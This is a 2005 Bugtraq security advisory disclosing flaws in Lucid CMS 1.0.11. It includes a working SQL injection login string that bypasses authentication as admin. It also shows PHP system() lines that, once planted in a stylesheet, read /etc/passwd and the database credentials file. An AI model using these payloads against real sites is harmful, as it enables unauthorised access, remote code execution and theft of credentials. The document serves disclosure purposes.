[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
From: retrogod () aliceposta ! it
Date: 2005-09-29 20:51:24
Message-ID: 20050929205124.8897.qmail () securityfocus ! com
[Download RAW message or body]
Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
software:
site: http://lucidcms.net/
description:
lucidCMS is a simple and flexible content management system for the individual or
organization that wishes to manage a collection of web pages without the overhead
and complexity of other available "community" CMS options.
1) if magic quotes off -> SQL Injection:
you can login as admin typing in login form:
login: 'UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing] ^
|
|
this is the hash \
of...nothing
the result of md5('');
note:"login" without spaces
the login query become:
SELECT * FROM lucid_users WHERE \
name=''UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'
2)
now new admin can edit template and insert evil javascript code, see the phpinfo(), \
manage users/groups, activate/disable plugins, you can activate renderPHP plugin, add \
the following line at the end of the main stylesheet:
<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>
to see /etc/passwd file
<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>
to see database username/password, the database name and table prefix... now you have \
the full control of the database
rgod
site: http://altervista.org
mail: retrogod@aliceposta.it
original advisory: http://rgod.altervista.org/lucidcms1011.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic